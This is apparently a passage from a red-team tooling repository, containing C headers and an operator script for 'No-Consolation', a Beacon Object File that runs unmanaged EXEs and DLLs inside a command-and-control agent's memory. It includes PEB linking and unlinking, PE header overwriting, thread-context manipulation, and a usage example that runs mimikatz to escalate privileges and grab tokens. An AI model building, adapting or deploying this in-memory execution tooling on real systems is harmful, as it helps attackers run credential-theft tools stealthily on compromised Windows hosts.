     BeaconPrintf(CALLBACK_OUTPUT, "DEBUG: %s:%d:%s(): ", __FILE__, __LINE__, __FUNCTION__); \
     BeaconPrintf(CALLBACK_OUTPUT, __VA_ARGS__); \
 }
#else
 #define DPRINT(...)
#endif

#if defined(DEBUG)
 #define DPRINT_ERR(...) { \
     BeaconPrintf(CALLBACK_ERROR, "ERROR: %s:%d:%s(): ", __FILE__, __LINE__, __FUNCTION__); \
     BeaconPrintf(CALLBACK_ERROR, __VA_ARGS__); \
 }
#else
 #define DPRINT_ERR(...)
#endif

#define syscall_failed(syscall_name, status) \
    DPRINT_ERR( \
        "Failed to call %s, status: 0x%lx", \
        syscall_name, \
        status \
    )

#define function_failed(function) \
    DPRINT_ERR( \
        "Call to '%s' failed, error: %ld", \
        function, \
        GetLastError() \
    )

#define malloc_failed() function_failed("malloc")

#define api_not_found(function) \
    DPRINT_ERR( \
        "The address of '%s' was not found", \
        function \
    )


================================================
FILE: Execution-BOF/No-Consolation/include/peb.h
================================================
#pragma once

#include "bofdefs.h"
#include "loader.h"

#ifdef _WIN64
 #define PEB_OFFSET 0x60
 #define READ_MEMLOC __readgsqword
#else
 #define PEB_OFFSET 0x30
 #define READ_MEMLOC __readfsdword
#endif

#define LDRP_IMAGE_DLL 0x00000004
#define LDRP_ENTRY_INSERTED 0x00008000
#define LDRP_ENTRY_PROCESSED 0x00004000
#define LDRP_DONT_CALL_FOR_THREADS 0x00040000
#define LDRP_PROCESS_ATTACH_CALLED 0x00080000

LPVOID xGetProcAddress(
    IN LPVOID base,
    IN PCHAR api_name,
    IN DWORD ordinal);

LPVOID xGetLibAddress(
    IN PCHAR search,
    IN BOOL load,
    OUT PBOOL loaded);

BOOL link_module(
    IN PLOADED_PE_INFO peinfo,
    IN PVOID base_address);

BOOL unlink_module(
    IN PLDR_DATA_TABLE_ENTRY2 ldr_entry);


================================================
FILE: Execution-BOF/No-Consolation/include/runner.h
================================================
#pragma once

#include "bofdefs.h"

#define BUFFER_SIZE 4096
#define _WAIT_TIMEOUT 500

// thread context related macros, simplify x64/x86 support

#ifdef _WIN64
#define CONTEXT_SET_IP( ctx, p ) ctx.Rip = (ULONG_PTR)p
#define CONTEXT_SET_ARG1( ctx, p ) ctx.Rcx = (ULONG_PTR)p
#define CONTEXT_SET_ARG2( ctx, p ) ctx.Rdx = (ULONG_PTR)p
#define CONTEXT_SET_ARG3( ctx, p ) ctx.R8 = (ULONG_PTR)p
#define CONTEXT_GET_RET( ctx ) *(PVOID*)ctx.Rsp
#define CONTEXT_SET_RET( ctx, p ) *(PVOID*)ctx.Rsp = p
#else
#define CONTEXT_SET_IP( ctx, p ) ctx.Eip = (ULONG_PTR)p
#define CONTEXT_SET_ARG1( ctx, p ) *(PVOID*)(ctx.Esp + sizeof(PVOID)) = p
#define CONTEXT_SET_ARG2( ctx, p ) *(PVOID*)(ctx.Esp + sizeof(PVOID) * 2) = p
#define CONTEXT_SET_ARG3( ctx, p ) *(PVOID*)(ctx.Esp + sizeof(PVOID) * 3) = p
#define CONTEXT_GET_RET( ctx ) *(PVOID*)ctx.Esp
#define CONTEXT_SET_RET( ctx, p ) *(PVOID*)ctx.Esp = p
#define CONTEXT_ADD_STACK_SPACE( ctx, p ) ctx.Esp -= p
#endif

BOOL run_pe(
    IN PLOADED_PE_INFO peinfo);


================================================
FILE: Execution-BOF/No-Consolation/include/utils.h
================================================
#pragma once

#define ARGUMENT_PRESENT(ArgumentPointer) \
  ((CHAR*)((ULONG_PTR)(ArgumentPointer)) != (CHAR*)NULL)

#define MAXUSHORT 65535
#define MAX_USTRING ( sizeof(WCHAR) * (MAXUSHORT/sizeof(WCHAR)) )

#define STATUS_INVALID_BUFFER_SIZE 0xC0000206

PVOID find_ldrp_handle_tls_data(VOID);

PVOID find_ldrp_release_tls_entry(VOID);

VOID insert_tail_list(
    PLIST_ENTRY ListHead,
    PLIST_ENTRY Entry);

VOID unlink_from_list(
    PLIST_ENTRY Entry);

SIZE_T StringLengthA(
    IN LPCSTR String);

PCHAR StringConcatA(
    IN PCHAR String,
    IN PCHAR String2);

VOID myRtlInitUnicodeString(
    OUT PUNICODE_STRING DestinationString,
    IN PCWSTR SourceString);

SIZE_T StringLengthW(
    IN LPCWSTR String);

PCHAR StringCopyA(
    IN PCHAR String1,
    IN PCHAR String2);

SIZE_T WCharStringToCharString(
    IN PCHAR Destination,
    IN PWCHAR Source,
    IN SIZE_T MaximumAllowed);

SIZE_T CharStringToWCharString(
    IN PWCHAR Destination,
    IN PCHAR Source,
    IN SIZE_T MaximumAllowed);

LONG RtlCompareUnicodeString(
    IN PCUNICODE_STRING String1,
    IN PCUNICODE_STRING String2,
    IN BOOLEAN CaseInSensitive);

VOID RtlInitEmptyUnicodeString(
    OUT PUNICODE_STRING UnicodeString,
    IN PWCHAR Buffer,
    IN UINT16 BufferSize);

LONG RtlCompareUnicodeStrings(
    IN CONST WCHAR* String1,
    IN SIZE_T Length1,
    IN CONST WCHAR* String2,
    IN SIZE_T Length2,
    IN BOOLEAN CaseInSensitive);

BOOL string_is_included(
    IN PCHAR list_of_strings,
    IN PCHAR string_to_search);

BOOL find_pattern(
    IN PVOID dwAddress,
    IN ULONG32 dwLen,
    IN PBYTE bMask,
    IN PCHAR szMask,
    OUT PVOID* pattern_addr);

BOOL is_pe(
    IN HMODULE hLibrary);

BOOL is_dll(
    IN HMODULE hLibrary);

VOID store_loaded_dll(
    IN PLOADED_PE_INFO peinfo,
    IN HMODULE dll,
    IN PCHAR name);

FARPROC WINAPI my_get_proc_address(
    IN HMODULE hModule,
    IN LPSTR lpProcName);

HMODULE WINAPI my_get_module_handle_w(
  IN LPCWSTR lpModuleName);

#ifdef _WIN64
BOOL insert_inverted_function_table_entry(
    IN PVOID base_address,
    IN SIZE_T size_of_image,
    IN PRUNTIME_FUNCTION func_table,
    IN DWORD size_of_table);

BOOL remove_inverted_function_table_entry(
    IN PRUNTIME_FUNCTION func_table);
#endif

HANDLE get_console_handle(VOID);

VOID set_console_handle(
	IN HANDLE hConsoleHandle);

HANDLE get_std_out_handle(VOID);

VOID set_std_out_handle(
	IN HANDLE hStdOutErr);

HANDLE get_std_err_handle(VOID);

VOID set_std_err_handle(
	IN HANDLE hStdOutErr);

HANDLE get_std_in_handle(VOID);

DWORD get_tid(VOID);

VOID rtl_exit_user_thread(VOID);

BOOL create_thread(
    OUT PHANDLE hThread);

BOOL read_local_pe(
    IN LPCTSTR path,
    OUT PVOID* data,
    OUT int* pelen);


================================================
FILE: Execution-BOF/No-Consolation/no_consolation.axs
================================================
var cmd_no_consolation = ax.create_command("noconsolation", "Run an unmanaged EXE/DLL inside agents's memory", "noconsolation --binary /tmp/mimikatz.exe --args \"privilege::debug token::elevate exit\"");
cmd_no_consolation.addArgFlagString("--local",  "LOCAL_PATH",               false,   "The binary should be loaded from the disk on the target Windows machine");
cmd_no_consolation.addArgFlagString("--memory", "MEMORY_PATH",              false,   "The binary should be loaded from the memory on the target Windows machine");
cmd_no_consolation.addArgFlagFile(  "-f",       "BINARY",                   false,   "Full path to the windows EXE/DLL you wish you run inside agent. If already loaded, you can simply specify the binary name.");
cmd_no_consolation.addArgFlagString("-a",       "ARGS",                     false,   "Parameters for the PE. Must be provided after the path");
cmd_no_consolation.addArgBool(       "--inthread",                                   "Run the PE with the main thread. This might hang your agent depending on the PE and its arguments");
cmd_no_consolation.addArgBool(       "--link-to-peb",                                "Load the PE into the PEB");
cmd_no_consolation.addArgBool(       "--dont-unload",                                "If set, the DLL won't be unloaded");
cmd_no_consolation.addArgFlagInt(    "--timeout", "NUM_SECONDS",            false,   "The number of seconds you wish to wait for the PE to complete running. Default 60 seconds. Set to 0 to disable");
cmd_no_consolation.addArgBool(       "-k",                                           "Overwrite the PE headers");
cmd_no_consolation.addArgFlagString( "--method", "EXPORT_NAME",             false,   "Method or function name to execute in case of DLL. If not provided, DllMain will be executed");
cmd_no_consolation.addArgBool(       "-w",                                           "Command line is passed to unmanaged DLL function in UNICODE format. (default is ANSI)");
cmd_no_consolation.addArgBool(       "-no",                                          "Do not try to obtain the output");
cmd_no_consolation.addArgBool(       "-ac",                                          "Allocate a console. This will spawn a new process");
cmd_no_consolation.addArgBool(       "-ch",                                          "Close Pipe handles once finished. If PowerShell was already ran, this will break the output for PowerShell in the future");
cmd_no_consolation.addArgFlagString( "--free-libraries", "FL_DLLS",         false,   "List of DLLs (DLL_A,DLL_B) (previously loaded with --dont-unload) to be offloaded");
cmd_no_consolation.addArgBool(       "--dont-save",                                  "Do not save this binary in memory");
cmd_no_consolation.addArgBool(       "--list-pes",                                   "List all PEs that have been loaded in memory");
cmd_no_consolation.addArgFlagString( "--unload-pe", "PE_NAME",              false,   "Unload from memory a PE");
cmd_no_consolation.addArgBool(       "-lad",                                         "Custom load all the PE's dependencies");
cmd_no_consolation.addArgFlagString( "-ladb", "LADB_DLLS",                  false,   "Custom load all the PE's dependencies except these (DLL_A,DLL_B)");
cmd_no_consolation.addArgFlagString( "-ld", "LD_DLLS",                      false,   "Custom load these PE's dependencies (DLL_A,DLL_B)");
cmd_no_consolation.addArgFlagString( "-sp", "PATHS",                       false,   "Look for DLLs on these paths (PATH_A,PATH_B) (system32 is the default)");

cmd_no_consolation.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines)
{
    let is_local = 0;
    let local = "";
    let is_memory = 0;
    let memory = "";
    let is_binary = 0;
    let binary = "";
    let is_args = 0;
    let args = "";
    let path = "";
    let pename = "";
    let pepath = "";
    let path_set = 0;
    let name_set = 0;
    let pebytes = "";
    let headers = 0;
    let method = "";
    let use_unicode = 0;
    let timeout = 60;
    let timeout_set = 0;
    let nooutput = 0;
    let alloc_console = 0;
    let close_handles = 0;
    let free_libs = "";
    let dont_save = 0;
    let list_pes = 0;
    let is_unload_pe = 0;
    let unload_pe = "";
    let link_to_peb = 0;
    let dont_unload = 0;
    let load_all_deps = 0;
    let load_all_deps_but = "";
    let load_deps = "";
    let search_paths = "";
    let inthread = 0;
    let pecmdline = "";

    if( ax.is64(id) == false ) { throw new Error("WoW64 is not supported"); }

    if(parsed_json["-k"]) { headers = 1; }
    if(parsed_json["-w"]) { use_unicode = 1; }
    if(parsed_json["-no"]) { nooutput = 1; }
    if(parsed_json["-ac"]) { alloc_console = 1; }
    if(parsed_json["-ch"]) { close_handles = 1; }
    if(parsed_json["--dont-save"]) { dont_save = 1; }
    if(parsed_json["--list-pes"]) { list_pes = 1; }
    if(parsed_json["--link-to-peb"]) { link_to_peb = 1; }
    if(parsed_json["--dont-unload"]) { dont_unload = 1; }
    if(parsed_json["-lad"]) { load_all_deps = 1; }

    if("EXPORT_NAME" in parsed_json) { method = parsed_json["EXPORT_NAME"]; }
    if("FL_DLLS" in parsed_json) { free_libs = parsed_json["FL_DLLS"]; }
    if("LADB_DLLS" in parsed_json) { load_all_deps_but = parsed_json["LADB_DLLS"]; }
    if("LD_DLLS" in parsed_json) { load_deps = parsed_json["LD_DLLS"]; }
    if("PATHS" in parsed_json) { search_paths = parsed_json["PATHS"]; }

    if("PE_NAME" in parsed_json) {
        is_unload_pe = 1;
        unload_pe = parsed_json["PE_NAME"];
    }

    if("LOCAL_PATH" in parsed_json)  {
        is_local = 1;
        local = parsed_json["LOCAL_PATH"];
    }

    if("MEMORY_PATH" in parsed_json)  {
        is_memory = 1;
        memory = parsed_json["MEMORY_PATH"];
    }

    if("BINARY" in parsed_json)  {
        is_binary = 1;
        binary = parsed_json["BINARY"];
    }

    if("ARGS" in parsed_json)  {
        is_args = 1;
        args = parsed_json["ARGS"];
    }

    if("NUM_SECONDS" in parsed_json) {
        timeout = parsed_json["NUM_SECONDS"];
        timeout_set = 1;
    }

    if( is_local + is_binary + is_memory > 1 ) { throw new Error("You must specify either --local, --memory or -f"); }

    if(is_binary) {
        path_set = 1;
    }
    else if(is_local && /^[A-Za-z]:\\.*/.test(local)) {
        path = local;
        path_set = 1;
    }
    else if(is_memory && /^[A-Za-z].*\.exe/.test(memory)) {
        name_set = 1;
        pename = memory;
    }
    else if(list_pes == 0 && is_unload_pe == 0) {
        throw new Error("Specified executable does not exist");
    }

    if( free_libs.length == 0 && unload_pe.length == 0 && list_pes == 0 && name_set == 0 && path_set == 0 && close_handles == 0 ) { throw new Error("PE path not provided"); }
    if( (path_set || unload_pe || free_libs) && list_pes ) { throw new Error("The option --list-pes must be ran alone"); }
    if( free_libs && unload_pe )                           { throw new Error("The option --unload-pe must be ran alone"); }
    if( path_set && (unload_pe || free_libs) )             { throw new Error("The option --unload-pe or --free-libraries must be ran alone") };
    if( timeout_set && inthread )                          { throw new Error("The options --inthread and --timeout are not compatible"); }

    if(path_set) {
        if(is_binary) {
            pename = ax.hash("md5", 8, binary) + ".exe";
            pepath = "C:\\Windows\\System32\\" + pename;
            pebytes = binary
            path = "";
        }
        else {
            pename = ax.file_basename(path);
            pepath = path;
        }
    }

    if (path_set || name_set) {
        pecmdline = pename;
        if(is_args) {
            pecmdline += " " + args;
        }
    }

    var timestamp = ax.format_time("dd/MM hh:mm", ax.ticks());

    let bof_path = ax.script_dir() + "_bin/NoConsolation." + ax.arch(id) + ".o";
    let bof_params = ax.bof_pack("wstr,cstr,wstr,bytes,cstr,int,int,int,wstr,cstr,wstr,int,int,int,int,cstr,int,int,cstr,cstr,int,int,int,cstr,cstr,cstr,int", [pename, pename, pepath, pebytes, path, is_local, timeout, headers, pecmdline, pecmdline, method, use_unicode, nooutput, alloc_console, close_handles, free_libs, dont_save, list_pes, unload_pe, timestamp, link_to_peb, dont_unload, load_all_deps, load_all_deps_but, load_deps, search_paths, inthread ]);
    let message = `Task: execute ${pename} via No-Consolation BOF`;
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message);
});

================================================
FILE: Execution-BOF/No-Consolation/source/apisetlookup.c
================================================
/**
 * API Set Lookup
 * Copyright (c) 2018-2019 Aidan Khoury. All rights reserved.
 *
 * @file apiset.c
 * @authors Aidan Khoury (ajkhoury)
 * @date 11/22/2018
 */

#include "apisetlookup.h"

//
// ApiSet DLL prefixes.
//

#define API_SET_DLL_EXTENSTION  (ULONGLONG)0x004C004C0044002E /* L".DLL" */

//
// Useful macros for ApiSet api.
//

#define API_SET_CHAR_TO_LOWER(c) \
    (((WCHAR)((c) - L'A') <= (L'a' - L'A' - 1)) ? ((c) + 0x20) : (c))


//
// API set schema version 6.
//

#define GET_API_SET_NAMESPACE_ENTRY_V6(ApiSetNamespace, Index) \
    ((PAPI_SET_NAMESPACE_ENTRY_V6)((ULONG_PTR)(ApiSetNamespace) + \
                                ((PAPI_SET_NAMESPACE_V6)(ApiSetNamespace))->EntryOffset + \
                                    ((Index) * sizeof(API_SET_NAMESPACE_ENTRY_V6))))

#define GET_API_SET_NAMESPACE_VALUE_ENTRY_V6(ApiSetNamespace, Entry, Index) \
    ((PAPI_SET_VALUE_ENTRY_V6)((ULONG_PTR)(ApiSetNamespace) + \
                                ((PAPI_SET_NAMESPACE_ENTRY_V6)(Entry))->ValueOffset + \
                                    ((Index) * sizeof(API_SET_VALUE_ENTRY_V6))))

#define GET_API_SET_NAMESPACE_ENTRY_NAME_V6(ApiSetNamespace, Entry) \
    ((PWCHAR)((ULONG_PTR)(ApiSetNamespace) + ((PAPI_SET_NAMESPACE_ENTRY_V6)(Entry))->NameOffset))

#define GET_API_SET_NAMESPACE_ENTRY_VALUE_V6(ApiSetNamespace, Entry) \
    ((PWCHAR)((ULONG_PTR)(ApiSetNamespace) + ((PAPI_SET_NAMESPACE_ENTRY_V6)(Entry))->ValueOffset))

#define GET_API_SET_VALUE_ENTRY_NAME_V6(ApiSetNamespace, Entry) \
    ((PWCHAR)((ULONG_PTR)(ApiSetNamespace) + ((PAPI_SET_VALUE_ENTRY_V6)(Entry))->NameOffset))

#define GET_API_SET_VALUE_ENTRY_VALUE_V6(ApiSetNamespace, Entry) \
    ((PWCHAR)((ULONG_PTR)(ApiSetNamespace) + ((PAPI_SET_VALUE_ENTRY_V6)(Entry))->ValueOffset))

#define GET_API_SET_HASH_ENTRY_V6(ApiSetNamespace, Middle) \
    ((PAPI_SET_HASH_ENTRY_V6)((ULONG_PTR)(ApiSetNamespace) + \
                            ((PAPI_SET_NAMESPACE_V6)(ApiSetNamespace))->HashOffset + \
                                ((Middle) * sizeof(API_SET_HASH_ENTRY_V6))))

PAPI_SET_NAMESPACE_ENTRY_V6
ApiSetpSearchForApiSetV6(
    IN PAPI_SET_NAMESPACE_V6 ApiSetNamespace,
    IN PWCHAR ApiSetNameToResolve,
    IN USHORT ApiSetNameToResolveLength
)
{
    PWCHAR                 pwc             = NULL;
    USHORT                 Count           = 0;
    ULONG                  HashKey         = 0;
    LONG                   Low             = 0;
    LONG                   Middle          = 0;
    LONG                   High            = 0;
    PAPI_SET_HASH_ENTRY_V6 HashEntry       = NULL;
    PAPI_SET_NAMESPACE_ENTRY_V6 FoundEntry = NULL;

    if (!ApiSetNameToResolveLength) {
        return NULL;
    }

    //
    // Calculate hash key for this ApiSet name.
    //
    HashKey = 0;
    pwc = ApiSetNameToResolve;
    Count = ApiSetNameToResolveLength;
    do {
        HashKey = HashKey * ApiSetNamespace->HashFactor + (USHORT)API_SET_CHAR_TO_LOWER(*pwc);
        ++pwc;
        --Count;
    } while (Count);

    //
    // Lookup the matching hash in the ApiSet namespace using a binary search.
    //
    FoundEntry = NULL;
    Low = 0;
    Middle = 0;
    High = (LONG)ApiSetNamespace->Count - 1;

    while (High >= Low) {
        Middle = (Low + High) >> 1;

        HashEntry = GET_API_SET_HASH_ENTRY_V6(ApiSetNamespace, Middle);

        if (HashKey < HashEntry->Hash) {
            High = Middle - 1;
        } else if (HashKey > HashEntry->Hash) {
            Low = Middle + 1;
        } else {
            //
            // Get the namespace entry from the hash entry index.
            //
            FoundEntry = GET_API_SET_NAMESPACE_ENTRY_V6(ApiSetNamespace, HashEntry->Index);
            break;
        }
    }

    //
    // If the high index is less than the low index, then a matching hash entry was not found.
    // Otherwise, get the found namespace entry.
    //
    if (High < Low) {
        return NULL;
    }

    //
    // Final check on apiset library name in order to make sure we didn't collide with
    // another hash bucket.
    //
    if (RtlCompareUnicodeStrings(ApiSetNameToResolve,
                                 ApiSetNameToResolveLength,
                                 GET_API_SET_NAMESPACE_ENTRY_NAME_V6(ApiSetNamespace, FoundEntry),
                                 FoundEntry->HashedLength / sizeof(WCHAR),
                                 TRUE) == 0) {
        return FoundEntry;
    }

    return NULL;
}

PAPI_SET_VALUE_ENTRY_V6
ApiSetpSearchForApiSetHostV6(
    IN PAPI_SET_NAMESPACE_ENTRY_V6 Entry,
    IN WCHAR *ApiSetNameToResolve,
    IN USHORT ApiSetNameToResolveLength,
    IN PAPI_SET_NAMESPACE_V6 ApiSetNamespace)
{
    LONG                    Low             = 0;
    LONG                    Middle          = 0;
    LONG                    High            = 0;
    LONG                    Result          = 0;
    PAPI_SET_VALUE_ENTRY_V6 FoundEntry      = NULL;
    PAPI_SET_VALUE_ENTRY_V6 ApiSetHostEntry = NULL;

    //
    // If there is no alias, don't bother checking each one.
    //
    FoundEntry = GET_API_SET_NAMESPACE_VALUE_ENTRY_V6(ApiSetNamespace, Entry, 0);

    High = (LONG)(Entry->ValueCount - 1);
    if (!High) {
        return FoundEntry;
    }

    Low = 1; // skip the first entry.

    while (Low <= High) {
        Middle = (Low + High) >> 1;

        ApiSetHostEntry = GET_API_SET_NAMESPACE_VALUE_ENTRY_V6(ApiSetNamespace, Entry, Middle);

        //
        // Compare API names.
        //
        Result = RtlCompareUnicodeStrings(ApiSetNameToResolve,
                                          ApiSetNameToResolveLength,
                                          GET_API_SET_VALUE_ENTRY_NAME_V6(ApiSetNamespace, ApiSetHostEntry),
                                          ApiSetHostEntry->NameLength / sizeof(WCHAR),
                                          TRUE);
        if (Result < 0) {
            High = Middle - 1;
        } else if (Result > 0) {
            Low = Middle + 1;
        } else {
            FoundEntry = GET_API_SET_NAMESPACE_VALUE_ENTRY_V6(ApiSetNamespace, Entry, Middle);
            break;
        }
    }

    return FoundEntry;
}

BOOL ApiSetResolveToHostV6(
    IN PAPI_SET_NAMESPACE ApiSetNamespace,
    IN PUNICODE_STRING ApiSetNameToResolve,
    IN PUNICODE_STRING ParentName,
    OUT PUNICODE_STRING Output)
{
    BOOL                        IsResolved             = FALSE;
    PWCHAR                      ApiSetNameBuffer       = 0;
    PWCHAR                      pwc                    = 0;
    ULONG                       ApiSetNameBufferLength = 0;
    USHORT                      ApiSetNameNoExtLength  = 0;
    PAPI_SET_NAMESPACE_ENTRY_V6 ResolvedNamespaceEntry = NULL;
    PAPI_SET_VALUE_ENTRY_V6     HostLibraryEntry       = NULL;

    RtlInitEmptyUnicodeString(Output, NULL, 0);

    ApiSetNameBuffer = ApiSetNameToResolve->Buffer;

    //
    // Compute word count of apiset library name without the dll suffix and anything
    // beyond the last hyphen. Example: 
    //     api-ms-win-core-apiquery-l1-1-0.dll -> wordlen(api-ms-win-core-apiquery-l1-1)
    //
    ApiSetNameBufferLength = (ULONG)ApiSetNameToResolve->Length;
    pwc = RVA2VA(PWCHAR, ApiSetNameBuffer, ApiSetNameBufferLength);
    do {
        if (ApiSetNameBufferLength <= 1)
            break;
        ApiSetNameBufferLength -= sizeof(WCHAR);
        --pwc;
    } while (*pwc != L'-');

    ApiSetNameNoExtLength = (USHORT)(ApiSetNameBufferLength / sizeof(WCHAR));
    if (!ApiSetNameNoExtLength) {
        goto Exit;
    }

    //
    // Hash table lookup.
    //
    ResolvedNamespaceEntry = ApiSetpSearchForApiSetV6(
        (PAPI_SET_NAMESPACE_V6)ApiSetNamespace,
        ApiSetNameBuffer,
        ApiSetNameNoExtLength);
    if (!ResolvedNamespaceEntry) {
        goto Exit;
    }

    //
    // Look for aliases in hosts libraries if necessary.
    //
    if (ResolvedNamespaceEntry->ValueCount > 1 && ParentName) {

        HostLibraryEntry = ApiSetpSearchForApiSetHostV6(
            ResolvedNamespaceEntry,
            ParentName->Buffer,
            ParentName->Length / sizeof(WCHAR),
            (PAPI_SET_NAMESPACE_V6)ApiSetNamespace);

    } else if (ResolvedNamespaceEntry->ValueCount > 0) {

        HostLibraryEntry = GET_API_SET_NAMESPACE_VALUE_ENTRY_V6(ApiSetNamespace,
                                                                ResolvedNamespaceEntry,
                                                                0);
    } else {
        goto Exit;
    }

    //
    // Output resolved host library.
    //
    Output->Length = (USHORT)HostLibraryEntry->ValueLength;
    Output->MaximumLength = Output->Length;
    Output->Buffer = GET_API_SET_VALUE_ENTRY_VALUE_V6(ApiSetNamespace, HostLibraryEntry);

    IsResolved = TRUE;

Exit:
    return IsResolved;
}



//
// API set schema version 4.
//

#define GET_API_SET_NAMESPACE_ENTRY_V4(ApiSetNamespace, Index) \
    ((PAPI_SET_NAMESPACE_ENTRY_V4)(((PAPI_SET_NAMESPACE_ARRAY_V4)(ApiSetNamespace))->Array + \
                                        Index))

#define GET_API_SET_NAMESPACE_ENTRY_NAME_V4(ApiSetNamespace, NamespaceEntry) \
    ((PWCHAR)((ULONG_PTR)(ApiSetNamespace) + \
                ((PAPI_SET_NAMESPACE_ENTRY_V4)(NamespaceEntry))->NameOffset))

#define GET_API_SET_NAMESPACE_ENTRY_DATA_V4(ApiSetNamespace, NamespaceEntry) \
    ((PAPI_SET_VALUE_ARRAY_V4)((ULONG_PTR)(ApiSetNamespace) + \
                                ((PAPI_SET_NAMESPACE_ENTRY_V4)(NamespaceEntry))->DataOffset))

#define GET_API_SET_VALUE_ENTRY_V4(ApiSetNamespace, ResolvedValueArray, Index) \
    ((PAPI_SET_VALUE_ENTRY_V4)(((PAPI_SET_VALUE_ARRAY_V4)(ResolvedValueArray))->Array + \
                                        Index))

#define GET_API_SET_VALUE_ENTRY_NAME_V4(ApiSetNamespace, ApiSetValueEntry) \
    ((WCHAR*)((ULONG_PTR)(ApiSetNamespace) + \
                ((PAPI_SET_VALUE_ENTRY_V4)(ApiSetValueEntry))->NameOffset))

#define GET_API_SET_VALUE_ENTRY_VALUE_V4(ApiSetNamespace, ApiSetValueEntry) \
    ((WCHAR*)((ULONG_PTR)(ApiSetNamespace) + \
                ((PAPI_SET_VALUE_ENTRY_V4)(ApiSetValueEntry))->ValueOffset))

PAPI_SET_NAMESPACE_ENTRY_V4
ApiSetpSearchForApiSetV4(
    IN PAPI_SET_NAMESPACE ApiSetNamespace,
    IN PWCHAR ApiSetNameToResolve,
    IN USHORT ApiSetNameToResolveLength
)
{
    LONG                        Low                  = 0;
    LONG                        Middle               = 0;
    LONG                        High                 = 0;
    LONG                        Result               = 0;
    PAPI_SET_NAMESPACE_ARRAY_V4 ApiSetNamespaceArray = NULL;
    PAPI_SET_NAMESPACE_ENTRY_V4 ApiSetNamespaceEntry = NULL;

    ApiSetNamespaceArray = (PAPI_SET_NAMESPACE_ARRAY_V4)ApiSetNamespace;

    Low = 0;
    High = (LONG)(ApiSetNamespaceArray->Count - 1);

    while (High >= Low) {
        Middle = (High + Low) >> 1;

        ApiSetNamespaceEntry = GET_API_SET_NAMESPACE_ENTRY_V4(ApiSetNamespace, Middle);

        Result = RtlCompareUnicodeStrings(
            ApiSetNameToResolve,
            ApiSetNameToResolveLength,
            GET_API_SET_NAMESPACE_ENTRY_NAME_V4(ApiSetNamespace, ApiSetNamespaceEntry),
            ApiSetNamespaceEntry->NameLength,
            TRUE);
        if (Result < 0) {
            High = Middle - 1;
        } else if (Result > 0) {
            Low = Middle + 1;
        } else {
            return ApiSetNamespaceEntry;
        }
    }

    return NULL;
}

PAPI_SET_VALUE_ENTRY_V4
ApiSetpSearchForApiSetHostV4(
    IN PAPI_SET_VALUE_ARRAY_V4 ApiSetValueArray,
    IN WCHAR *ApiSetNameToResolve,
    IN USHORT ApiSetNameToResolveLength,
    IN PAPI_SET_NAMESPACE_ARRAY_V4 ApiSetNamespace)
{
    LONG                    Low             = 0;
    LONG                    Middle          = 0;
    LONG                    High            = 0;
    LONG                    Result          = 0;
    PAPI_SET_VALUE_ENTRY_V4 ApiSetHostEntry = NULL;

    Low = 1; // skip first entry.
    High = (LONG)(ApiSetValueArray->Count - 1);

    while (High >= Low) {
        Middle = (High + Low) >> 1;

        ApiSetHostEntry = GET_API_SET_VALUE_ENTRY_V4(ApiSetNamespace, ApiSetValueArray, Middle);

        Result = RtlCompareUnicodeStrings(
            ApiSetNameToResolve,
            ApiSetNameToResolveLength,
            GET_API_SET_VALUE_ENTRY_NAME_V4(ApiSetNamespace, ApiSetHostEntry),
            ApiSetHostEntry->NameLength,
            TRUE);
        if (Result < 0) {
            High = Middle - 1;
        } else if (Result > 0) {
            Low = Middle + 1;
        } else {
            return ApiSetHostEntry;
        }
    }

    return NULL;
}

BOOL ApiSetResolveToHostV4(
    IN PAPI_SET_NAMESPACE ApiSetNamespace,
    IN PUNICODE_STRING ApiSetNameToResolve,
    IN PUNICODE_STRING ParentName,
    OUT PUNICODE_STRING Output)
{
    BOOL                        IsResolved             = FALSE;
    PAPI_SET_NAMESPACE_ENTRY_V4 ResolvedNamespaceEntry = NULL;
    PAPI_SET_VALUE_ARRAY_V4     ResolvedValueArray     = NULL;
    PAPI_SET_VALUE_ENTRY_V4     HostLibraryEntry       = NULL;
    UNICODE_STRING              ApiSetNameNoExtString  = { 0 };

    RtlInitEmptyUnicodeString(Output, NULL, 0);

    //
    // Skip the prefix.
    //
    ApiSetNameNoExtString.Length = ApiSetNameToResolve->Length - 8;
    ApiSetNameNoExtString.MaximumLength = ApiSetNameNoExtString.Length;
    ApiSetNameNoExtString.Buffer = RVA2VA(PWCHAR, ApiSetNameToResolve->Buffer, 8);

    //
    // Cut off the '.DLL' extension.
    //
    if (ApiSetNameNoExtString.Length >= sizeof(API_SET_DLL_EXTENSTION) &&
        ApiSetNameNoExtString.Buffer[(ApiSetNameNoExtString.Length -
                                      sizeof(API_SET_DLL_EXTENSTION)) / sizeof(WCHAR)] == L'.') {
        ApiSetNameNoExtString.Length -= sizeof(API_SET_DLL_EXTENSTION);
    }

    ResolvedNamespaceEntry = ApiSetpSearchForApiSetV4(
        ApiSetNamespace,
        ApiSetNameNoExtString.Buffer,
        ApiSetNameNoExtString.Length / sizeof(WCHAR));
    if (!ResolvedNamespaceEntry) {
        goto Exit;
    }

    //
    // Get the namspace value array.
    //
    ResolvedValueArray = GET_API_SET_NAMESPACE_ENTRY_DATA_V4(ApiSetNamespace,
                                                             ResolvedNamespaceEntry);

    //
    // Look for aliases in hosts libraries if necessary.
    //
    if (ResolvedValueArray->Count > 1 && ParentName) {

        HostLibraryEntry = ApiSetpSearchForApiSetHostV4(
            ResolvedValueArray,
            ParentName->Buffer,
            ParentName->Length / sizeof(WCHAR),
            (PAPI_SET_NAMESPACE_ARRAY_V4)ApiSetNamespace);

    } else if (ResolvedValueArray->Count > 0) {
        HostLibraryEntry = GET_API_SET_VALUE_ENTRY_V4(ApiSetNamespace, ResolvedValueArray, 0);
    } else {
        goto Exit;
    }

    Output->Length = (USHORT)HostLibraryEntry->ValueLength;
    Output->MaximumLength = Output->Length;
    Output->Buffer = GET_API_SET_VALUE_ENTRY_VALUE_V4(ApiSetNamespace, HostLibraryEntry);

    IsResolved = TRUE;

Exit:
    return IsResolved;
}



//
// API Set Schema Version 3
//

#define GET_API_SET_NAMESPACE_ENTRY_V3(ApiSetNamespace, Index) \
    ((PAPI_SET_NAMESPACE_ENTRY_V3)(((PAPI_SET_NAMESPACE_ARRAY_V3)(ApiSetNamespace))->Array + \
                                        Index))

#define GET_API_SET_NAMESPACE_ENTRY_NAME_V3(ApiSetNamespace, NamespaceEntry) \
    ((PWCHAR)((ULONG_PTR)(ApiSetNamespace) + \
                ((PAPI_SET_NAMESPACE_ENTRY_V3)(NamespaceEntry))->NameOffset))

